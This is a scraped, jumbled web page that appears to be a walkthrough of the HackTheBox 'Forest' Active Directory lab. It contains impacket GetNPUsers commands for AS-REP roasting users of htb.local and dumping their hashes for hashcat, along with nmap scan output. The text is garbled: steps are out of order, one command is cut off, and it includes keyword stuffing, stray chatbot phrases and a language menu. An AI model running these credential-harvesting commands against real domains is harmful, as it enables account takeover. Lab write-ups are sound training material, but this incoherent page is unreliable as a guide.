impacket-GetNPUsers -dc-ip 10.10.10.161 -no-pass -usersfile users.txt htb.local/
Mastering Forest: The Best HackTheBox Active Directory Walkthrough
Save the extracted usernames into a file named users.txt . You will notice several standard AD service accounts and unique usernames like sebastien , lucas , andy , and marko . 🏹 Step 3: Initial Access via AS-REP Roasting forest hackthebox walkthrough best
We use the impacket-GetNPUsers script to test our user list for this vulnerability:
If you want, I can:
python3 GetNPUsers.py htb.local/ -no-pass -usersfile users.txt -dc-ip Use code with caution.
Add your new user to the group. powershell impacket-GetNPUsers -dc-ip 10
We have a list of valid usernames. This allows us to proceed to the next attack vector: Kerberos User Enumeration.
PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 9389/tcp open mc-nmf .NET Message Framing Add your new user to the group
GetNPUsers.py htb.local/ -userfile users.txt -format hashcat -outputfile hashes.asrep -dc-ip 10.10.10.161 Use code with caution.
English
French
Hindi
Russian
Portuguese
German
Arabic
Turkish
Norwegian
Italian
中文
Ελληνικά
Japanese
Norwegian
Polski
Português do Brasil
Spanish
Ukrainian
Việt Nam
Türkçe